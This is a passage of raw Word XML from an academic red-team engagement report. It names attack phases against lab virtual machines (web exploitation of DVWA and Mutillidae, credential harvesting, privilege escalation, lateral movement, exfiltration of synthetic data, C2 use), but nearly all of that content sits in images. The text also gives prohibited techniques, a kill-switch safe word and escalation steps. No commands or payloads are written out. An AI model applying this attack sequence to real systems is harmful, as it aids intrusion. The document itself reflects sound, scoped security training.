                      <a:ext cx="2301032" cy="1836604"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00D551F9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35384807" wp14:editId="4B3003D1">
            <wp:extent cx="2818130" cy="1767715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1631011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011000" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2838121" cy="1780255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B6193E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="3CF3408E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Network scanning and enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B006A0A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="39F0F566" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="002E60D7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C0F4983" wp14:editId="4183DF3C">
            <wp:extent cx="5731510" cy="4177665"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1623696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96033" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4177665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0315E1" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="4D6B520C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="05BD1419" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41B8BC7A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67237367" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Web application exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560F2383" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In Firefox on kali </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD2446A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>http:// 192.168.56.102/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mutillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26975899" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>http://192.168.56.102/dvwa/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172EA101" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="006F56B9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B17E6EC" wp14:editId="5F02DBAD">
            <wp:extent cx="5731510" cy="3155950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1142890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90027" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3155950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E35869" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="003378BC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BB26414" wp14:editId="55B5F9C7">
            <wp:extent cx="5731510" cy="3062605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1377568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68711" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3062605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C3A510" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="000710ED">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="413C2F12" wp14:editId="3CE68EF8">
            <wp:extent cx="5731510" cy="3178810"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1772516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516317" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3178810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA02676" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00744291">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74079A3B" wp14:editId="62B4B6FA">
            <wp:extent cx="5731510" cy="3220085"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="675582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582368" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3220085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF059EE" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF315C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49DC843D" wp14:editId="2BC9F5D2">
            <wp:extent cx="5731510" cy="3203575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="117485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859239" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3203575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB6C9DD" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E6B0B49" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="001F79AF" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F79AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Credential harvesting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9CCDDB" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="00CC682B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DE85513" wp14:editId="5514A74C">
            <wp:extent cx="5731510" cy="3199130"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1981769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769901" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3199130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39921856" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="00BA2A82">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1462EFF2" wp14:editId="329BC885">
            <wp:extent cx="5731510" cy="3243580"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="887492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492466" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3243580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="267834AD" w14:textId="77777777" w:rsidR="003225CE" w:rsidRDefault="003225CE" w:rsidP="00C934DB"/>
    <w:p w14:paraId="34BC638D" w14:textId="0738BB5B" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Local privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A43D690" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="000476EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D68533C" wp14:editId="464DF21F">
            <wp:extent cx="4705063" cy="2413000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="161313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13869" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4710264" cy="2415668"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ED390A" w14:textId="77777777" w:rsidR="003225CE" w:rsidRDefault="003225CE" w:rsidP="00C934DB"/>
    <w:p w14:paraId="66C1E898" w14:textId="77777777" w:rsidR="003225CE" w:rsidRDefault="003225CE" w:rsidP="00C934DB"/>
    <w:p w14:paraId="3347A9C3" w14:textId="77777777" w:rsidR="003225CE" w:rsidRDefault="003225CE" w:rsidP="00C934DB"/>
    <w:p w14:paraId="7AF5F670" w14:textId="77777777" w:rsidR="003225CE" w:rsidRDefault="003225CE" w:rsidP="00C934DB"/>
    <w:p w14:paraId="0D4460F4" w14:textId="77777777" w:rsidR="003225CE" w:rsidRDefault="003225CE" w:rsidP="00C934DB"/>
    <w:p w14:paraId="5350710B" w14:textId="77777777" w:rsidR="003225CE" w:rsidRDefault="003225CE" w:rsidP="00C934DB"/>
    <w:p w14:paraId="318AAECE" w14:textId="77777777" w:rsidR="003225CE" w:rsidRDefault="003225CE" w:rsidP="00C934DB"/>
    <w:p w14:paraId="1060E3A7" w14:textId="77777777" w:rsidR="003225CE" w:rsidRDefault="003225CE" w:rsidP="00C934DB"/>
    <w:p w14:paraId="578B30F2" w14:textId="3060E5E9" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Lateral movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E19D91" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="00941E3D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="374E7A7C" wp14:editId="58BDBE1D">
            <wp:extent cx="5731510" cy="3364230"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1407139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139599" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3364230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17667B80" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="519C9D57" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Controlled data exfiltration of synthetic data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004CE328" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="003D2D2A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02333AED" wp14:editId="42F6F160">
            <wp:extent cx="5635128" cy="3267075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10437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7459" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5668073" cy="3286175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B33320" w14:textId="350BCEE7" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:bookmarkStart w:id="2" w:name="OLE_LINK4"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:t>Use of C2 frameworks (real or simulated)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="391BCE14" w14:textId="77777777" w:rsidR="001237AD" w:rsidRDefault="001237AD" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF61070" w14:textId="6C99AA8D" w:rsidR="008C212B" w:rsidRDefault="00C84191" w:rsidP="00C934DB">
      <w:r w:rsidRPr="00C84191">
        <w:t>By the end of the reconnaissance phase, the red team had a complete picture of the attack surface. Three distinct exploitation paths were identified, one for each target VM, which formed the basis of the three-exploit attack chain executed in subsequent phase</w:t>
      </w:r>
      <w:r w:rsidR="008C212B">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00B27DCD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C596962" w14:textId="77777777" w:rsidR="00B27DCD" w:rsidRPr="0022784D" w:rsidRDefault="00B27DCD" w:rsidP="00B27DCD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022784D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.3 Prohibited Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2CDD0D" w14:textId="77777777" w:rsidR="00B27DCD" w:rsidRDefault="00B27DCD" w:rsidP="00B27DCD">
      <w:r>
        <w:t>The following techniques were strictly prohibited throughout the engagement to ensure the safety of the lab environment, compliance with ethical guidelines, and alignment with academic red team standards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BBD33A" w14:textId="77777777" w:rsidR="0022784D" w:rsidRDefault="00B27DCD" w:rsidP="00B27DCD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Denial-of-Service (DoS): No DoS or DDoS attacks were conducted against any target VM. Such techniques risk destabilising the virtual environment and provide no meaningful intelligence for a red team assessment focused on stealth and realistic attacker behaviour.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739DB9F3" w14:textId="77777777" w:rsidR="0022784D" w:rsidRDefault="00B27DCD" w:rsidP="00B27DCD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Destructive malware (wipers, ransomware): No destructive payloads were deployed at any stage. The engagement objective was to demonstrate exploitation and data access, not to cause irreversible damage. Deploying real ransomware or wipers in a lab environment risks permanent data loss and hypervisor instability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14975E17" w14:textId="672438A3" w:rsidR="00B27DCD" w:rsidRDefault="00B27DCD" w:rsidP="00B27DCD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploits that risk hypervisor compromise: All exploits were scoped strictly to the guest virtual machines. No techniques targeting VirtualBox itself or the host operating system were permitted, ensuring the lab environment remained stable and recoverable throughout the engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13962CEB" w14:textId="77777777" w:rsidR="00563883" w:rsidRDefault="00F515F9" w:rsidP="00563883">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B50011">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Handling of real PII or production data:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> All data used during the engagement was entirely synthetic. The sensitive file accessed on the Windows 7 workstation (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>192.168.56.103</w:t>
      </w:r>
      <w:r>
        <w:t>) contained dummy customer records created specifically for this exercise. No real personally identifiable information was processed at any point, ensuring full compliance with UK GDPR obligations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712B13DE" w14:textId="45EC4169" w:rsidR="00F515F9" w:rsidRDefault="00F515F9" w:rsidP="00563883">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563883">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Social engineering of real staff (simulated only)</w:t>
      </w:r>
      <w:r w:rsidRPr="00563883">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> No real individuals were targeted with phishing, vishing, or any other social engineering technique. Any references to social engineering within the threat emulation plan represent simulated or documented techniques only, consistent with academic red team reporting standards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E44C226" w14:textId="77777777" w:rsidR="00F515F9" w:rsidRDefault="00F515F9" w:rsidP="00B50011">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FD6F4F0" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="00B42F44" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B42F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.4 Kill Switch / Safe Word</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347F6046" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>If any activity risks destabilising the environment or breaching scope, the safe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">word </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>ABORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>ABCD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> must be issued. Upon hearing this, all offensive operations cease immediately, and the environment is reverted to a known</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>good snapshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159D230A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="485606A8" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="005D5B20" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D5B20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.5 Communication and Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274A3493" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Red Team Lead → ABCD Security Contact via Teams/email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CFA133" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Daily status summaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C680B68" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Immediate escalation for critical findings or unexpected behaviour</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8A3B26" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Final debrief, including executive summary and team meeting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680BD447" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
